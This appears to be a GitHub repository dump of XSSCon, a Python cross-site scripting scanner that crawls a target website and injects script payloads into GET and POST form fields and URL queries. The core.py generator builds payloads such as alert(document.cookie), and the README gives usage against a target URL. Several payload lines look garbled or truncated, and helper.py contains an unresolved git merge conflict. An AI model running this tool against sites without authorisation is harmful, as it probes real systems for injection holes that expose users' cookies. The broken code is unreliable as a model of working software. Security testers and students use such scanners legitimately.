├── LICENSE
├── README.md
├── images
├── logo.png
└── screenshot.png
├── lib
├── core.py
├── crawler
│ └── crawler.py
└── helper
│ ├── Log.py
│ └── helper.py
├── requirements.txt
└── xsscon.py
/LICENSE:
--------------------------------------------------------------------------------
1 | MIT License
2 |
3 | Copyright (c) 2019 menkrep1337
4 |
5 | Permission is hereby granted, free of charge, to any person obtaining a copy
6 | of this software and associated documentation files (the "Software"), to deal
7 | in the Software without restriction, including without limitation the rights
8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
9 | copies of the Software, and to permit persons to whom the Software is
10 | furnished to do so, subject to the following conditions:
11 |
12 | The above copyright notice and this permission notice shall be included in all
13 | copies or substantial portions of the Software.
14 |
15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
21 | SOFTWARE.
22 |
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 |
2 | 
3 | A powerful XSS scanner made in python 3.7
4 |
5 |
6 | ## Installing
7 |
8 | Requirements:
9 |
10 |
BeautifulSoup4
11 |
12 | ```bash
13 | pip install bs4
14 | ```
15 | requests
16 |
17 | ```bash
18 | pip install requests
19 | ```
20 | python 3.7
21 |
22 | Commands:
23 |
24 | ```bash
25 | git clone https://github.com/menkrep1337/XSSCon
26 | chmod 755 -R XSSCon
27 | cd XSSCon
28 | python3 xsscon.py --help
29 | ```
30 | ## Usage
31 | Basic usage:
32 |
33 | ```bash
34 | python3 xsscon.py -u http://testphp.vulnweb.com
35 | ```
36 |
37 | Advanced usage:
38 |
39 | ```bash
40 | python3 xsscon.py --help
41 | ```
42 |
43 | ## Main features
44 |
45 | * crawling all links on a website ( crawler engine )
46 | * POST and GET forms are supported
47 | * many settings that can be customized
48 | * Advanced error handling
49 | * Multiprocessing support.✔️
50 | * ETC....
51 |
52 |
53 | ## Screenshot
54 |
55 |
56 |
57 | ## Roadmap
58 |
59 | v0.3B:
60 | ------
61 | Added custom options ( --proxy, --user-agent etc... )
62 |
63 |
64 | v0.3B Patch:
65 | ------
66 | Added support for ( form method GET )
67 |
68 | v0.4B:
69 | ------
70 | Improved Error handling
71 | Now Multiple parameters for GET method is Supported
72 |
73 | v0.5 Release (Final):
74 | ------
75 | * Bug fixed
76 | * Now cookies is supported. (--cookie {})
77 | ## Note
78 | * Sorry for my bad english
79 | * if you run xsscon on the win10 terminal you will get an untidy output
80 | * now it doesn't support DOM
81 |
82 |
--------------------------------------------------------------------------------
/images/logo.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/menkrep1337/XSSCon/ce91fd6ff3a3e9057ea97b67792497a5be73383e/images/logo.png
--------------------------------------------------------------------------------
/images/screenshot.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/menkrep1337/XSSCon/ce91fd6ff3a3e9057ea97b67792497a5be73383e/images/screenshot.png
--------------------------------------------------------------------------------
/lib/core.py:
--------------------------------------------------------------------------------
1 | from lib.helper.helper import *
2 | from random import randint
3 | from bs4 import BeautifulSoup
4 | from urllib.parse import urljoin,urlparse,parse_qs,urlencode
5 | from lib.helper.Log import *
6 |
7 | class core:
8 |
9 | @classmethod
10 | def generate(self,eff):
11 | FUNCTION=[
12 | "prompt(5000/200)",
13 | "alert(6000/3000)",
14 | "alert(document.cookie)",
15 | "prompt(document.cookie)",
16 | "console.log(5000/3000)"
17 | ]
18 | if eff == 1:
19 | return ""+FUNCTION[randint(0,4)]+"<\script\>"
20 |
21 | elif eff == 2:
22 | return "<\script/>"+FUNCTION[randint(0,4)]+"<\\script>"
23 |
24 | elif eff == 3:
25 | return "<\script\> "+FUNCTION[randint(0,4)]+"/script>"
26 |
27 | elif eff == 4:
28 | return ""
35 |
36 | @classmethod
37 | def post_method(self):
38 | bsObj=BeautifulSoup(self.body,"html.parser")
39 | forms=bsObj.find_all("form",method=True)
40 |
41 | for form in forms:
42 | try:
43 | action=form["action"]
44 | except KeyError:
45 | action=self.url
46 |
47 | if form["method"].lower().strip() == "post":
48 | Log.warning("Target have form with POST method: "+C+urljoin(self.url,action))
49 | Log.info("Collecting form input key.....")
50 |
51 | keys={}
52 | for key in form.find_all(["input","textarea"]):
53 | try:
54 | if key["type"] == "submit":
55 | Log.info("Form key name: "+G+key["name"]+N+" value: "+G+"")
56 | keys.update({key["name"]:key["name"]})
57 |
58 | else:
59 | Log.info("Form key name: "+G+key["name"]+N+" value: "+G+self.payload)
60 | keys.update({key["name"]:self.payload})
61 |
62 | except Exception as e:
63 | Log.info("Internal error: "+str(e))
64 |
65 | Log.info("Sending payload (POST) method...")
66 | req=self.session.post(urljoin(self.url,action),data=keys)
67 | if self.payload in req.text:
68 | Log.high("Detected XSS (POST) at "+urljoin(self.url,req.url))
69 | Log.high("Post data: "+str(keys))
70 | else:
71 | Log.info("This page is safe from XSS (POST) attack but not 100% yet...")
72 |
73 | @classmethod
74 | def get_method_form(self):
75 | bsObj=BeautifulSoup(self.body,"html.parser")
76 | forms=bsObj.find_all("form",method=True)
77 |
78 | for form in forms:
79 | try:
80 | action=form["action"]
81 | except KeyError:
82 | action=self.url
83 |
84 | if form["method"].lower().strip() == "get":
85 | Log.warning("Target have form with GET method: "+C+urljoin(self.url,action))
86 | Log.info("Collecting form input key.....")
87 |
88 | keys={}
89 | for key in form.find_all(["input","textarea"]):
90 | try:
91 | if key["type"] == "submit":
92 | Log.info("Form key name: "+G+key["name"]+N+" value: "+G+"")
93 | keys.update({key["name"]:key["name"]})
94 |
95 | else:
96 | Log.info("Form key name: "+G+key["name"]+N+" value: "+G+self.payload)
97 | keys.update({key["name"]:self.payload})
98 |
99 | except Exception as e:
100 | Log.info("Internal error: "+str(e))
101 | try:
102 | Log.info("Form key name: "+G+key["name"]+N+" value: "+G+self.payload)
103 | keys.update({key["name"]:self.payload})
104 | except KeyError as e:
105 | Log.info("Internal error: "+str(e))
106 |
107 | Log.info("Sending payload (GET) method...")
108 | req=self.session.get(urljoin(self.url,action),params=keys)
109 | if self.payload in req.text:
110 | Log.high("Detected XSS (GET) at "+urljoin(self.url,req.url))
111 | Log.high("GET data: "+str(keys))
112 | else:
113 | Log.info("This page is safe from XSS (GET) attack but not 100% yet...")
114 |
115 | @classmethod
116 | def get_method(self):
117 | bsObj=BeautifulSoup(self.body,"html.parser")
118 | links=bsObj.find_all("a",href=True)
119 | for a in links:
120 | url=a["href"]
121 | if url.startswith("http://") is False or url.startswith("https://") is False or url.startswith("mailto:") is False:
122 | base=urljoin(self.url,a["href"])
123 | query=urlparse(base).query
124 | if query != "":
125 | Log.warning("Found link with query: "+G+query+N+" Maybe a vuln XSS point")
126 |
127 | query_payload=query.replace(query[query.find("=")+1:len(query)],self.payload,1)
128 | test=base.replace(query,query_payload,1)
129 |
130 | query_all=base.replace(query,urlencode({x: self.payload for x in parse_qs(query)}))
131 |
132 | Log.info("Query (GET) : "+test)
133 | Log.info("Query (GET) : "+query_all)
134 |
135 | _respon=self.session.get(test)
136 | if self.payload in _respon.text or self.payload in self.session.get(query_all).text:
137 | Log.high("Detected XSS (GET) at "+_respon.url)
138 | else:
139 | Log.info("This page is safe from XSS (GET) attack but not 100% yet...")
140 |
141 | @classmethod
142 | def main(self,url,proxy,headers,payload,cookie,method=2):
143 |
144 | print(W+"*"*15)
145 | self.payload=payload
146 | self.url=url
147 |
148 | self.session=session(proxy,headers,cookie)
149 | Log.info("Checking connection to: "+Y+url)
150 | try:
151 | ctr=self.session.get(url)
152 | self.body=ctr.text
153 | except Exception as e:
154 | Log.high("Internal error: "+str(e))
155 | return
156 |
157 | if ctr.status_code > 400:
158 | Log.info("Connection failed "+G+str(ctr.status_code))
159 | return
160 | else:
161 | Log.info("Connection estabilished "+G+str(ctr.status_code))
162 |
163 | if method >= 2:
164 | self.post_method()
165 | self.get_method()
166 | self.get_method_form()
167 |
168 | elif method == 1:
169 | self.post_method()
170 |
171 | elif method == 0:
172 | self.get_method()
173 | self.get_method_form()
--------------------------------------------------------------------------------
/lib/crawler/crawler.py:
--------------------------------------------------------------------------------
1 | import requests
2 | from lib.helper.Log import *
3 | from lib.helper.helper import *
4 | from lib.core import *
5 | from bs4 import BeautifulSoup
6 | from urllib.parse import urljoin
7 | from multiprocessing import Process
8 |
9 | class crawler:
10 |
11 | visited=[]
12 |
13 | @classmethod
14 | def getLinks(self,base,proxy,headers,cookie):
15 |
16 | lst=[]
17 |
18 | conn=session(proxy,headers,cookie)
19 | text=conn.get(base).text
20 | isi=BeautifulSoup(text,"html.parser")
21 |
22 |
23 | for obj in isi.find_all("a",href=True):
24 | url=obj["href"]
25 |
26 | if url.startswith("http://") or url.startswith("https://"):
27 | continue
28 |
29 | elif url.startswith("mailto:") or url.startswith("javascript:"):
30 | continue
31 |
32 | elif urljoin(base,url) in self.visited:
33 | continue
34 |
35 | else:
36 | lst.append(urljoin(base,url))
37 | self.visited.append(urljoin(base,url))
38 |
39 | return lst
40 |
41 | @classmethod
42 | def crawl(self,base,depth,proxy,headers,level,method,cookie):
43 |
44 | urls=self.getLinks(base,proxy,headers,cookie)
45 |
46 | for url in urls:
47 |
48 | p=Process(target=core.main, args=(url,proxy,headers,level,cookie,method))
49 | p.start()
50 | p.join()
51 | if depth != 0:
52 | self.crawl(url,depth-1,base,proxy,level,method,cookie)
53 |
54 | else:
55 | break
--------------------------------------------------------------------------------
/lib/helper/Log.py:
--------------------------------------------------------------------------------
1 | '''
2 | XSSCon - 2019/2020
3 | This project was created by menkrep1337 with 407Aex team.
4 | Copyright under the MIT license
5 | '''
6 | from lib.helper.helper import *
7 | from datetime import datetime
8 | class Log:
9 |
10 | @classmethod
11 | def info(self,text):
12 | print("["+Y+datetime.now().strftime("%H:%M:%S")+N+"] ["+G+"INFO"+N+"] "+text)
13 |
14 | @classmethod
15 | def warning(self,text):
16 | print("["+Y+datetime.now().strftime("%H:%M:%S")+N+"] ["+Y+"WARNING"+N+"] "+text)
17 |
18 | @classmethod
19 | def high(self,text):
20 | print("["+Y+datetime.now().strftime("%H:%M:%S")+N+"] ["+R+"CRITICAL"+N+"] "+text)
21 |
--------------------------------------------------------------------------------
/lib/helper/helper.py:
--------------------------------------------------------------------------------
1 | '''
2 | XSSCon - 2019/2020
3 | This project was created by menkrep1337 with 407Aex team.
4 | Copyright under the MIT license
5 | '''
6 | import requests, json
7 | ##### Warna #######
8 | N = '\033[0m'
9 | W = '\033[1;37m'
10 | B = '\033[1;34m'
11 | M = '\033[1;35m'
12 | R = '\033[1;31m'
13 | G = '\033[1;32m'
14 | Y = '\033[1;33m'
15 | C = '\033[1;36m'
16 | ##### Styling ######
17 | underline = "\033[4m"
18 | ##### Default ######
19 | agent = {'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36'}
20 | line="—————————————————"
21 | #####################
22 | def session(proxies,headers,cookie):
23 | r=requests.Session()
24 | r.proxies=proxies
25 | r.headers=headers
26 | r.cookies.update(json.loads(cookie))
27 | return r
28 |
29 | logo=G+"""__ ______ ____ ____
30 | \ \/ / ___/ ___| / ___|___ _ __
31 | \ /\___ \___ \| | / _ \| '_ \ %s
32 | / \ ___) |__) | |__| (_) | | | | %s
33 | /_/\_\____/____/ \____\___/|_| |_|
34 | <<<<<<< HEAD
35 | """%(R+"{v0.5 Final}"+G,underline+C+"https://github.com/menkrep1337/XSSCon"+N+G)
36 |
37 | ##=======
38 | """%(R+"{v0.5 Final}"+G,underline+C+"https://github.com/menkrep1337/XSSCon"+N+G)
39 |
40 | >>>>>>> branch 'master' of https://github.com/menkrep1337/XSSCon
41 | """
42 |
--------------------------------------------------------------------------------
/requirements.txt:
--------------------------------------------------------------------------------
1 | bs4 >= 0.0.1
2 | requests >= 2.0.0
--------------------------------------------------------------------------------
/xsscon.py:
--------------------------------------------------------------------------------
1 | '''
2 | XSSCon - 2019/2020
3 | This project was created by menkrep1337 with 407Aex team.
4 | Copyright under the MIT license
5 | '''
6 | import argparse
7 | from lib.helper.helper import *
8 | from lib.helper.Log import *
9 | from lib.core import *
10 | from random import randint
11 | from lib.crawler.crawler import *
12 | epilog="""
13 | Github: https://www.github.com/menkrep1337/XSSCon
14 | Version: 0.5 Final
15 | """
16 | def check(getopt):
17 | payload=int(getopt.payload_level)
18 | if payload > 6 and getopt.payload is None:
19 | Log.info("Do you want use custom payload (Y/n)?")
20 | answer=input("> "+W)
21 | if answer.lower().strip() == "y":
22 | Log.info("Write the XSS payload below")
23 | payload=input("> "+W)
24 | else:
25 | payload=core.generate(randint(1,6))
26 |
27 | else:
28 | payload=core.generate(payload)
29 |
30 | return payload if getopt.payload is None else getopt.payload
31 |
32 | def start():
33 | parse=argparse.ArgumentParser(formatter_class=argparse.RawTextHelpFormatter,usage="XSSCon -u [options]",epilog=epilog,add_help=False)
34 |
35 | pos_opt=parse.add_argument_group("Options")
36 | pos_opt.add_argument("--help",action="store_true",default=False,help="Show usage and help parameters")
37 | pos_opt.add_argument("-u",metavar="",help="Target url (e.g. http://testphp.vulnweb.com)")
38 | pos_opt.add_argument("--depth",metavar="",help="Depth web page to crawl. Default: 2",default=2)
39 | pos_opt.add_argument("--payload-level",metavar="",help="Level for payload Generator, 7 for custom payload. {1...6}. Default: 6",default=6)
40 | pos_opt.add_argument("--payload",metavar="",help="Load custom payload directly (e.g. )",default=None)
41 | pos_opt.add_argument("--method",metavar="",help="Method setting(s): \n\t0: GET\n\t1: POST\n\t2: GET and POST (default)",default=2,type=int)
42 | pos_opt.add_argument("--user-agent",metavar="",help="Request user agent (e.g. Chrome/2.1.1/...)",default=agent)
43 | pos_opt.add_argument("--single",metavar="",help="Single scan. No crawling just one address")
44 | pos_opt.add_argument("--proxy",default=None,metavar="",help="Set proxy (e.g. {'https':'https://10.10.1.10:1080'})")
45 | pos_opt.add_argument("--about",action="store_true",help="Print information about XSSCon tool")
46 | pos_opt.add_argument("--cookie",help="Set cookie (e.g {'ID':'1094200543'})",default='''{"ID":"1094200543"}''',metavar="")
47 |
48 | getopt=parse.parse_args()
49 | print(logo)
50 | Log.info("Starting XSSCon...")
51 | if getopt.u:
52 | core.main(getopt.u,getopt.proxy,getopt.user_agent,check(getopt),getopt.cookie,getopt.method)
53 |
54 | crawler.crawl(getopt.u,int(getopt.depth),getopt.proxy,getopt.user_agent,check(getopt),getopt.method,getopt.cookie)
55 |
56 | elif getopt.single:
57 | core.main(getopt.single,getopt.proxy,getopt.user_agent,check(getopt),getopt.cookie,getopt.method)
58 |
59 | elif getopt.about:
60 | print("""
61 | ***************
62 | Project: XSSCon
63 | License: MIT
64 | Author: menkrep1337
65 | Last updates: 2019 may 26
66 | Note: Take your own RISK
67 | ****************
68 | """+epilog)
69 | else:
70 | parse.print_help()
71 |
72 | if __name__=="__main__":
73 | start()
74 |
--------------------------------------------------------------------------------